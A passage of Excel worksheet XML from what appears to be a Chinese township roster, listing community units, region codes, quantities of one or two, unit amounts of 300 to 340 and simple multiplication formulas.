      <c r="B961" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C961" s="14" t="s">
        <v>2396</v>
      </c>
      <c r="D961" s="14" t="s">
        <v>2554</v>
      </c>
      <c r="E961" s="14" t="s">
        <v>2555</v>
      </c>
      <c r="F961" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G961" s="14">
        <v>1</v>
      </c>
      <c r="H961" s="14">
        <v>340</v>
      </c>
      <c r="I961" s="14">
        <f t="shared" si="45"/>
        <v>340</v>
      </c>
      <c r="J961" s="24">
        <v>45108</v>
      </c>
      <c r="K961" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="962" ht="23" customHeight="1" spans="1:11">
      <c r="A962" s="13" t="s">
        <v>2556</v>
      </c>
      <c r="B962" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C962" s="14" t="s">
        <v>2413</v>
      </c>
      <c r="D962" s="14" t="s">
        <v>2557</v>
      </c>
      <c r="E962" s="14" t="s">
        <v>323</v>
      </c>
      <c r="F962" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G962" s="14">
        <v>2</v>
      </c>
      <c r="H962" s="14">
        <v>300</v>
      </c>
      <c r="I962" s="14">
        <f t="shared" si="45"/>
        <v>600</v>
      </c>
      <c r="J962" s="24">
        <v>45108</v>
      </c>
      <c r="K962" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="963" ht="23" customHeight="1" spans="1:11">
      <c r="A963" s="13" t="s">
        <v>2558</v>
      </c>
      <c r="B963" s="14" t="str">
        <f>B962</f>
        <v>城关镇</v>
      </c>
      <c r="C963" s="14" t="str">
        <f>C962</f>
        <v>中华社区外贸局</v>
      </c>
      <c r="D963" s="14" t="s">
        <v>2559</v>
      </c>
      <c r="E963" s="13" t="s">
        <v>2560</v>
      </c>
      <c r="F963" s="14" t="str">
        <f>F962</f>
        <v>4113210108</v>
      </c>
      <c r="G963" s="14"/>
      <c r="H963" s="14"/>
      <c r="I963" s="14"/>
      <c r="J963" s="24"/>
      <c r="K963" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="964" ht="23" customHeight="1" spans="1:11">
      <c r="A964" s="13" t="s">
        <v>2561</v>
      </c>
      <c r="B964" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C964" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D964" s="14" t="s">
        <v>2562</v>
      </c>
      <c r="E964" s="14" t="s">
        <v>400</v>
      </c>
      <c r="F964" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G964" s="14">
        <v>1</v>
      </c>
      <c r="H964" s="14">
        <v>340</v>
      </c>
      <c r="I964" s="14">
        <f t="shared" ref="I964:I971" si="46">H964*G964</f>
        <v>340</v>
      </c>
      <c r="J964" s="24">
        <v>45108</v>
      </c>
      <c r="K964" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="965" ht="23" customHeight="1" spans="1:11">
      <c r="A965" s="13" t="s">
        <v>2563</v>
      </c>
      <c r="B965" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C965" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D965" s="14" t="s">
        <v>2564</v>
      </c>
      <c r="E965" s="14" t="s">
        <v>2565</v>
      </c>
      <c r="F965" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G965" s="14">
        <v>1</v>
      </c>
      <c r="H965" s="14">
        <v>340</v>
      </c>
      <c r="I965" s="14">
        <f t="shared" si="46"/>
        <v>340</v>
      </c>
      <c r="J965" s="24">
        <v>45108</v>
      </c>
      <c r="K965" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="966" ht="23" customHeight="1" spans="1:11">
      <c r="A966" s="13" t="s">
        <v>2566</v>
      </c>
      <c r="B966" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C966" s="14" t="s">
        <v>2388</v>
      </c>
      <c r="D966" s="14" t="s">
        <v>2567</v>
      </c>
      <c r="E966" s="14" t="s">
        <v>569</v>
      </c>
      <c r="F966" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G966" s="14">
        <v>1</v>
      </c>
      <c r="H966" s="14">
        <v>340</v>
      </c>
      <c r="I966" s="14">
        <f t="shared" si="46"/>
        <v>340</v>
      </c>
      <c r="J966" s="24">
        <v>45108</v>
      </c>
      <c r="K966" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="967" ht="23" customHeight="1" spans="1:11">
      <c r="A967" s="13" t="s">
        <v>2568</v>
      </c>
      <c r="B967" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C967" s="14" t="s">
        <v>2569</v>
      </c>
      <c r="D967" s="14" t="s">
        <v>2570</v>
      </c>
      <c r="E967" s="14" t="s">
        <v>2571</v>
      </c>
      <c r="F967" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G967" s="14">
        <v>1</v>
      </c>
      <c r="H967" s="14">
        <v>340</v>
      </c>
      <c r="I967" s="14">
        <f t="shared" si="46"/>
        <v>340</v>
      </c>
      <c r="J967" s="24">
        <v>45108</v>
      </c>
      <c r="K967" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="968" ht="23" customHeight="1" spans="1:11">
      <c r="A968" s="13" t="s">
        <v>2572</v>
      </c>
      <c r="B968" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C968" s="14" t="s">
        <v>2573</v>
      </c>
      <c r="D968" s="14" t="s">
        <v>2574</v>
      </c>
      <c r="E968" s="14" t="s">
        <v>592</v>
      </c>
      <c r="F968" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G968" s="14">
        <v>1</v>
      </c>
      <c r="H968" s="14">
        <v>340</v>
      </c>
      <c r="I968" s="14">
        <f t="shared" si="46"/>
        <v>340</v>
      </c>
      <c r="J968" s="24">
        <v>45108</v>
      </c>
      <c r="K968" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="969" ht="23" customHeight="1" spans="1:11">
      <c r="A969" s="13" t="s">
        <v>2575</v>
      </c>
      <c r="B969" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C969" s="14" t="s">
        <v>2388</v>
      </c>
      <c r="D969" s="14" t="s">
        <v>2576</v>
      </c>
      <c r="E969" s="14" t="s">
        <v>346</v>
      </c>
      <c r="F969" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G969" s="14">
        <v>1</v>
      </c>
      <c r="H969" s="14">
        <v>340</v>
      </c>
      <c r="I969" s="14">
        <f t="shared" si="46"/>
        <v>340</v>
      </c>
      <c r="J969" s="24">
        <v>45108</v>
      </c>
      <c r="K969" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="970" ht="23" customHeight="1" spans="1:11">
      <c r="A970" s="13" t="s">
        <v>2577</v>
      </c>
      <c r="B970" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C970" s="14" t="s">
        <v>2578</v>
      </c>
      <c r="D970" s="14" t="s">
        <v>2579</v>
      </c>
      <c r="E970" s="14" t="s">
        <v>1009</v>
      </c>
      <c r="F970" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G970" s="14">
        <v>1</v>
      </c>
      <c r="H970" s="14">
        <v>340</v>
      </c>
      <c r="I970" s="14">
        <f t="shared" si="46"/>
        <v>340</v>
      </c>
      <c r="J970" s="24">
        <v>45108</v>
      </c>
      <c r="K970" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="971" ht="23" customHeight="1" spans="1:11">
      <c r="A971" s="13" t="s">
        <v>2580</v>
      </c>
      <c r="B971" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C971" s="14" t="s">
        <v>2396</v>
      </c>
      <c r="D971" s="14" t="s">
        <v>2581</v>
      </c>
      <c r="E971" s="14" t="s">
        <v>2582</v>
      </c>
      <c r="F971" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G971" s="14">
        <v>2</v>
      </c>
      <c r="H971" s="14">
        <v>300</v>
      </c>
      <c r="I971" s="14">
        <f t="shared" si="46"/>
        <v>600</v>
      </c>
      <c r="J971" s="24">
        <v>45108</v>
      </c>
      <c r="K971" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="972" ht="23" customHeight="1" spans="1:11">
      <c r="A972" s="13" t="s">
        <v>2583</v>
      </c>
      <c r="B972" s="14" t="str">
        <f>B971</f>
        <v>城关镇</v>
      </c>
      <c r="C972" s="14" t="str">
        <f>C971</f>
        <v>中华社区商业中心</v>
      </c>
      <c r="D972" s="13" t="s">
        <v>2584</v>
      </c>
      <c r="E972" s="13" t="s">
        <v>2585</v>
      </c>
      <c r="F972" s="14" t="str">
        <f>F971</f>
        <v>4113210108</v>
      </c>
      <c r="G972" s="14"/>
      <c r="H972" s="14"/>
      <c r="I972" s="14"/>
      <c r="J972" s="24"/>
      <c r="K972" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="973" ht="23" customHeight="1" spans="1:11">
      <c r="A973" s="13" t="s">
        <v>2586</v>
      </c>
      <c r="B973" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C973" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D973" s="14" t="s">
        <v>2587</v>
      </c>
      <c r="E973" s="14" t="s">
        <v>2588</v>
      </c>
      <c r="F973" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G973" s="14">
        <v>2</v>
      </c>
      <c r="H973" s="14">
        <v>300</v>
      </c>
      <c r="I973" s="14">
        <f>H973*G973</f>
        <v>600</v>
      </c>
      <c r="J973" s="24">
        <v>45108</v>
      </c>
      <c r="K973" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="974" ht="23" customHeight="1" spans="1:11">
      <c r="A974" s="13" t="s">
        <v>2589</v>
      </c>
      <c r="B974" s="14" t="str">
        <f>B973</f>
        <v>城关镇</v>
      </c>
      <c r="C974" s="14" t="str">
        <f>C973</f>
        <v>中华社区工信局</v>
      </c>
      <c r="D974" s="13" t="s">
        <v>2590</v>
      </c>
      <c r="E974" s="13" t="s">
        <v>2591</v>
      </c>
      <c r="F974" s="14" t="str">
        <f>F973</f>
        <v>4113210108</v>
      </c>
      <c r="G974" s="14"/>
      <c r="H974" s="14"/>
      <c r="I974" s="14"/>
      <c r="J974" s="24"/>
      <c r="K974" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="975" ht="23" customHeight="1" spans="1:11">
      <c r="A975" s="13" t="s">
        <v>2592</v>
      </c>
      <c r="B975" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C975" s="14" t="s">
        <v>2413</v>
      </c>
      <c r="D975" s="14" t="s">
        <v>2593</v>
      </c>
      <c r="E975" s="14" t="s">
        <v>584</v>
      </c>
      <c r="F975" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G975" s="14">
        <v>2</v>
      </c>
      <c r="H975" s="14">
        <v>300</v>
      </c>
      <c r="I975" s="14">
        <f>H975*G975</f>
        <v>600</v>
      </c>
      <c r="J975" s="24">
        <v>45108</v>
      </c>
      <c r="K975" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="976" ht="23" customHeight="1" spans="1:11">
      <c r="A976" s="13" t="s">
        <v>2594</v>
      </c>
      <c r="B976" s="14" t="str">
        <f>B975</f>
        <v>城关镇</v>
      </c>
      <c r="C976" s="14" t="str">
        <f>C975</f>
        <v>中华社区外贸局</v>
      </c>
      <c r="D976" s="18" t="s">
        <v>2595</v>
      </c>
      <c r="E976" s="18" t="s">
        <v>2596</v>
      </c>
      <c r="F976" s="14" t="str">
        <f>F975</f>
        <v>4113210108</v>
      </c>
      <c r="G976" s="14"/>
      <c r="H976" s="14"/>
      <c r="I976" s="14"/>
      <c r="J976" s="24"/>
      <c r="K976" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="977" ht="23" customHeight="1" spans="1:11">
      <c r="A977" s="13" t="s">
        <v>2597</v>
      </c>
      <c r="B977" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C977" s="14" t="s">
        <v>2598</v>
      </c>
      <c r="D977" s="14" t="s">
        <v>2599</v>
      </c>
      <c r="E977" s="14" t="s">
        <v>292</v>
      </c>
      <c r="F977" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G977" s="14">
        <v>1</v>
      </c>
      <c r="H977" s="14">
        <v>340</v>
      </c>
      <c r="I977" s="14">
        <f>H977*G977</f>
        <v>340</v>
      </c>
      <c r="J977" s="24">
        <v>45108</v>
      </c>
      <c r="K977" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="978" ht="23" customHeight="1" spans="1:11">
      <c r="A978" s="13" t="s">
        <v>2600</v>
      </c>
      <c r="B978" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C978" s="14" t="s">
        <v>2396</v>
      </c>
      <c r="D978" s="14" t="s">
        <v>2601</v>
      </c>
      <c r="E978" s="14" t="s">
        <v>880</v>
      </c>
      <c r="F978" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G978" s="14">
        <v>1</v>
      </c>
      <c r="H978" s="14">
        <v>340</v>
      </c>
      <c r="I978" s="14">
        <f>H978*G978</f>
        <v>340</v>
      </c>
      <c r="J978" s="24">
        <v>45108</v>
      </c>
      <c r="K978" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="979" ht="23" customHeight="1" spans="1:11">
      <c r="A979" s="13" t="s">
        <v>2602</v>
      </c>
      <c r="B979" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C979" s="14" t="s">
        <v>2355</v>
      </c>
      <c r="D979" s="14" t="s">
        <v>2603</v>
      </c>
      <c r="E979" s="14" t="s">
        <v>592</v>
      </c>
      <c r="F979" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G979" s="14">
        <v>2</v>
      </c>
      <c r="H979" s="14">
        <v>340</v>
      </c>
      <c r="I979" s="14">
        <f>H979*G979</f>
        <v>680</v>
      </c>
      <c r="J979" s="24">
        <v>45108</v>
      </c>
      <c r="K979" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="980" ht="23" customHeight="1" spans="1:11">
      <c r="A980" s="13" t="s">
        <v>2604</v>
      </c>
      <c r="B980" s="14" t="str">
        <f>B979</f>
        <v>城关镇</v>
      </c>
      <c r="C980" s="14" t="str">
        <f>C979</f>
        <v>中华社区物资局</v>
      </c>
      <c r="D980" s="17" t="s">
        <v>2605</v>
      </c>
      <c r="E980" s="17" t="s">
        <v>343</v>
      </c>
      <c r="F980" s="14" t="str">
        <f>F979</f>
        <v>4113210108</v>
      </c>
      <c r="G980" s="14"/>
      <c r="H980" s="14"/>
      <c r="I980" s="14"/>
      <c r="J980" s="24"/>
      <c r="K980" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="981" ht="23" customHeight="1" spans="1:11">
      <c r="A981" s="13" t="s">
        <v>2606</v>
      </c>
      <c r="B981" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C981" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D981" s="14" t="s">
        <v>2607</v>
      </c>
      <c r="E981" s="14" t="s">
        <v>236</v>
      </c>
      <c r="F981" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G981" s="14">
        <v>2</v>
      </c>
      <c r="H981" s="14">
        <v>320</v>
      </c>
      <c r="I981" s="14">
        <f>H981*G981</f>
        <v>640</v>
      </c>
      <c r="J981" s="24">
        <v>45108</v>
      </c>
      <c r="K981" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="982" ht="23" customHeight="1" spans="1:11">
      <c r="A982" s="13" t="s">
        <v>2608</v>
      </c>
      <c r="B982" s="14" t="str">
        <f>B981</f>
        <v>城关镇</v>
      </c>
      <c r="C982" s="14" t="str">
        <f>C981</f>
        <v>中华社区工信局</v>
      </c>
      <c r="D982" s="19" t="s">
        <v>2609</v>
      </c>
      <c r="E982" s="19" t="s">
        <v>1902</v>
      </c>
      <c r="F982" s="14" t="str">
        <f>F981</f>
        <v>4113210108</v>
      </c>
      <c r="G982" s="14"/>
      <c r="H982" s="14"/>
      <c r="I982" s="14"/>
      <c r="J982" s="24"/>
      <c r="K982" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="983" ht="23" customHeight="1" spans="1:11">
      <c r="A983" s="13" t="s">
        <v>2610</v>
      </c>
      <c r="B983" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C983" s="14" t="s">
        <v>2355</v>
      </c>
      <c r="D983" s="14" t="s">
        <v>2611</v>
      </c>
      <c r="E983" s="14" t="s">
        <v>2612</v>
      </c>
      <c r="F983" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G983" s="14">
        <v>2</v>
      </c>
      <c r="H983" s="14">
        <v>300</v>
      </c>
      <c r="I983" s="14">
        <f>H983*G983</f>
        <v>600</v>
      </c>
      <c r="J983" s="24">
        <v>45108</v>
      </c>
      <c r="K983" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="984" ht="23" customHeight="1" spans="1:11">
      <c r="A984" s="13" t="s">
        <v>2613</v>
      </c>
      <c r="B984" s="14" t="str">
        <f>B983</f>
        <v>城关镇</v>
      </c>
      <c r="C984" s="14" t="str">
        <f>C983</f>
        <v>中华社区物资局</v>
      </c>
      <c r="D984" s="13" t="s">
        <v>2614</v>
      </c>
      <c r="E984" s="14" t="s">
        <v>2615</v>
      </c>
      <c r="F984" s="14" t="str">
        <f>F983</f>
        <v>4113210108</v>
      </c>
      <c r="G984" s="14"/>
      <c r="H984" s="14"/>
      <c r="I984" s="14"/>
      <c r="J984" s="24"/>
      <c r="K984" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="985" ht="23" customHeight="1" spans="1:11">
      <c r="A985" s="13" t="s">
        <v>2616</v>
      </c>
      <c r="B985" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C985" s="14" t="s">
        <v>2396</v>
      </c>
      <c r="D985" s="14" t="s">
        <v>2617</v>
      </c>
      <c r="E985" s="14" t="s">
        <v>2618</v>
      </c>
      <c r="F985" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G985" s="14">
        <v>2</v>
      </c>
      <c r="H985" s="14">
        <v>300</v>
      </c>
      <c r="I985" s="14">
        <f>H985*G985</f>
        <v>600</v>
      </c>
      <c r="J985" s="24">
        <v>45108</v>
      </c>
      <c r="K985" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="986" ht="23" customHeight="1" spans="1:11">
      <c r="A986" s="13" t="s">
        <v>2619</v>
      </c>
      <c r="B986" s="14" t="str">
        <f>B985</f>
        <v>城关镇</v>
      </c>
      <c r="C986" s="14" t="str">
        <f>C985</f>
        <v>中华社区商业中心</v>
      </c>
      <c r="D986" s="13" t="s">
        <v>2620</v>
      </c>
      <c r="E986" s="13" t="s">
        <v>2621</v>
      </c>
      <c r="F986" s="14" t="str">
        <f>F985</f>
        <v>4113210108</v>
      </c>
      <c r="G986" s="14"/>
      <c r="H986" s="14"/>
      <c r="I986" s="14"/>
      <c r="J986" s="24"/>
      <c r="K986" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="987" ht="23" customHeight="1" spans="1:11">
      <c r="A987" s="13" t="s">
        <v>2622</v>
      </c>
      <c r="B987" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C987" s="14" t="s">
        <v>2454</v>
      </c>
      <c r="D987" s="14" t="s">
        <v>2623</v>
      </c>
      <c r="E987" s="14" t="s">
        <v>2407</v>
      </c>
      <c r="F987" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G987" s="14">
        <v>1</v>
      </c>
      <c r="H987" s="14">
        <v>340</v>
      </c>
      <c r="I987" s="14">
        <f t="shared" ref="I987:I997" si="47">H987*G987</f>
        <v>340</v>
      </c>
      <c r="J987" s="24">
        <v>45108</v>
      </c>
      <c r="K987" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="988" ht="23" customHeight="1" spans="1:11">
      <c r="A988" s="13" t="s">
        <v>2624</v>
      </c>
      <c r="B988" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C988" s="14" t="s">
        <v>2396</v>
      </c>
      <c r="D988" s="14" t="s">
        <v>2625</v>
      </c>
      <c r="E988" s="14" t="s">
        <v>1702</v>
      </c>
      <c r="F988" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G988" s="14">
        <v>1</v>
      </c>
      <c r="H988" s="14">
        <v>340</v>
      </c>
      <c r="I988" s="14">
        <f t="shared" si="47"/>
        <v>340</v>
      </c>
      <c r="J988" s="24">
        <v>45108</v>
      </c>
      <c r="K988" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="989" ht="23" customHeight="1" spans="1:11">
      <c r="A989" s="13" t="s">
        <v>2626</v>
      </c>
      <c r="B989" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C989" s="14" t="s">
        <v>2451</v>
      </c>
      <c r="D989" s="14" t="s">
        <v>2627</v>
      </c>
      <c r="E989" s="14" t="s">
        <v>288</v>
      </c>
      <c r="F989" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G989" s="14">
        <v>1</v>
      </c>
      <c r="H989" s="14">
        <v>340</v>
      </c>
      <c r="I989" s="14">
        <f t="shared" si="47"/>
        <v>340</v>
      </c>
      <c r="J989" s="24">
        <v>45108</v>
      </c>
      <c r="K989" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="990" ht="23" customHeight="1" spans="1:11">
      <c r="A990" s="13" t="s">
        <v>2628</v>
      </c>
      <c r="B990" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C990" s="14" t="s">
        <v>2451</v>
      </c>
      <c r="D990" s="14" t="s">
        <v>2629</v>
      </c>
      <c r="E990" s="14" t="s">
        <v>346</v>
      </c>
      <c r="F990" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G990" s="14">
        <v>1</v>
      </c>
      <c r="H990" s="14">
        <v>340</v>
      </c>
      <c r="I990" s="14">
        <f t="shared" si="47"/>
        <v>340</v>
      </c>
      <c r="J990" s="24">
        <v>45108</v>
      </c>
      <c r="K990" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="991" ht="23" customHeight="1" spans="1:11">
      <c r="A991" s="13" t="s">
        <v>2630</v>
      </c>
      <c r="B991" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C991" s="14" t="s">
        <v>2454</v>
      </c>
      <c r="D991" s="14" t="s">
        <v>2631</v>
      </c>
      <c r="E991" s="14" t="s">
        <v>2632</v>
      </c>
      <c r="F991" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G991" s="14">
        <v>1</v>
      </c>
      <c r="H991" s="14">
        <v>340</v>
      </c>
      <c r="I991" s="14">
        <f t="shared" si="47"/>
        <v>340</v>
      </c>
      <c r="J991" s="24">
        <v>45108</v>
      </c>
      <c r="K991" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="992" ht="23" customHeight="1" spans="1:11">
      <c r="A992" s="13" t="s">
        <v>2633</v>
      </c>
      <c r="B992" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C992" s="14" t="s">
        <v>2569</v>
      </c>
      <c r="D992" s="14" t="s">
        <v>2634</v>
      </c>
      <c r="E992" s="14" t="s">
        <v>2635</v>
      </c>
      <c r="F992" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G992" s="14">
        <v>1</v>
      </c>
      <c r="H992" s="14">
        <v>340</v>
      </c>
      <c r="I992" s="14">
        <f t="shared" si="47"/>
        <v>340</v>
      </c>
      <c r="J992" s="24">
        <v>45108</v>
      </c>
      <c r="K992" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="993" ht="23" customHeight="1" spans="1:11">
      <c r="A993" s="13" t="s">
        <v>2636</v>
      </c>
      <c r="B993" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C993" s="14" t="s">
        <v>2413</v>
      </c>
      <c r="D993" s="14" t="s">
        <v>2637</v>
      </c>
      <c r="E993" s="14" t="s">
        <v>2638</v>
      </c>
      <c r="F993" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G993" s="14">
        <v>1</v>
      </c>
      <c r="H993" s="14">
        <v>340</v>
      </c>
      <c r="I993" s="14">
        <f t="shared" si="47"/>
        <v>340</v>
      </c>
      <c r="J993" s="24">
        <v>45108</v>
      </c>
      <c r="K993" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="994" ht="23" customHeight="1" spans="1:11">
      <c r="A994" s="13" t="s">
        <v>2639</v>
      </c>
      <c r="B994" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C994" s="14" t="s">
        <v>2454</v>
      </c>
      <c r="D994" s="14" t="s">
        <v>2640</v>
      </c>
      <c r="E994" s="14" t="s">
        <v>2641</v>
      </c>
      <c r="F994" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G994" s="14">
        <v>1</v>
      </c>
      <c r="H994" s="14">
        <v>340</v>
      </c>
      <c r="I994" s="14">
        <f t="shared" si="47"/>
        <v>340</v>
      </c>
      <c r="J994" s="24">
        <v>45108</v>
      </c>
      <c r="K994" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="995" ht="23" customHeight="1" spans="1:11">
      <c r="A995" s="13" t="s">
        <v>2642</v>
      </c>
      <c r="B995" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C995" s="14" t="s">
        <v>2413</v>
      </c>
      <c r="D995" s="14" t="s">
        <v>2643</v>
      </c>
      <c r="E995" s="14" t="s">
        <v>323</v>
      </c>
      <c r="F995" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G995" s="14">
        <v>1</v>
      </c>
      <c r="H995" s="14">
        <v>340</v>
      </c>
      <c r="I995" s="14">
        <f t="shared" si="47"/>
        <v>340</v>
      </c>
      <c r="J995" s="24">
        <v>45108</v>
      </c>
      <c r="K995" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="996" ht="23" customHeight="1" spans="1:11">
      <c r="A996" s="13" t="s">
        <v>2644</v>
      </c>
      <c r="B996" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C996" s="14" t="s">
        <v>2645</v>
      </c>
      <c r="D996" s="14" t="s">
        <v>2646</v>
      </c>
      <c r="E996" s="14" t="s">
        <v>2647</v>
      </c>
      <c r="F996" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G996" s="14">
        <v>1</v>
      </c>
      <c r="H996" s="14">
        <v>340</v>
      </c>
      <c r="I996" s="14">
        <f t="shared" si="47"/>
        <v>340</v>
      </c>
      <c r="J996" s="24">
        <v>45108</v>
      </c>
      <c r="K996" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="997" ht="23" customHeight="1" spans="1:11">
      <c r="A997" s="13" t="s">
        <v>2649</v>
      </c>
      <c r="B997" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C997" s="14" t="s">
        <v>2650</v>
      </c>
      <c r="D997" s="14" t="s">
        <v>2651</v>
      </c>
      <c r="E997" s="14" t="s">
        <v>265</v>
      </c>
      <c r="F997" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G997" s="14">
        <v>2</v>
      </c>
      <c r="H997" s="14">
        <v>300</v>
      </c>
      <c r="I997" s="14">
        <f t="shared" si="47"/>
        <v>600</v>
      </c>
      <c r="J997" s="24">
        <v>45108</v>
      </c>
      <c r="K997" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="998" ht="23" customHeight="1" spans="1:11">
      <c r="A998" s="13" t="s">
        <v>2652</v>
      </c>
      <c r="B998" s="14" t="str">
        <f>B997</f>
        <v>城关镇</v>
      </c>
      <c r="C998" s="14" t="str">
        <f>C997</f>
        <v>民主社区工信局</v>
      </c>
      <c r="D998" s="18" t="s">
        <v>2653</v>
      </c>
      <c r="E998" s="18" t="s">
        <v>1274</v>
      </c>
      <c r="F998" s="14" t="str">
        <f>F997</f>
        <v>4113210105</v>
      </c>
      <c r="G998" s="14"/>
      <c r="H998" s="14"/>
      <c r="I998" s="14"/>
      <c r="J998" s="24"/>
      <c r="K998" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="999" ht="23" customHeight="1" spans="1:11">
      <c r="A999" s="13" t="s">
        <v>2654</v>
      </c>
      <c r="B999" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C999" s="14" t="s">
        <v>2650</v>
      </c>
      <c r="D999" s="14" t="s">
        <v>2655</v>
      </c>
      <c r="E999" s="14" t="s">
        <v>303</v>
      </c>
      <c r="F999" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G999" s="14">
        <v>2</v>
      </c>
      <c r="H999" s="14">
        <v>300</v>
      </c>
      <c r="I999" s="14">
        <f>H999*G999</f>
        <v>600</v>
      </c>
      <c r="J999" s="24">
        <v>45108</v>
      </c>
      <c r="K999" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1000" ht="23" customHeight="1" spans="1:11">
      <c r="A1000" s="13" t="s">
        <v>2656</v>
      </c>
      <c r="B1000" s="14" t="str">
        <f>B999</f>
        <v>城关镇</v>
      </c>
      <c r="C1000" s="14" t="str">
        <f>C999</f>
        <v>民主社区工信局</v>
      </c>
      <c r="D1000" s="13" t="s">
        <v>2657</v>
      </c>
      <c r="E1000" s="14" t="s">
        <v>1009</v>
      </c>
      <c r="F1000" s="14" t="str">
        <f>F999</f>
        <v>4113210105</v>
      </c>
      <c r="G1000" s="14"/>
      <c r="H1000" s="14"/>
      <c r="I1000" s="14"/>
      <c r="J1000" s="24"/>
      <c r="K1000" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1001" ht="23" customHeight="1" spans="1:11">
      <c r="A1001" s="13" t="s">
        <v>2658</v>
      </c>
      <c r="B1001" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1001" s="14" t="s">
        <v>2650</v>
      </c>
      <c r="D1001" s="14" t="s">
        <v>2659</v>
      </c>
      <c r="E1001" s="14" t="s">
        <v>360</v>
      </c>
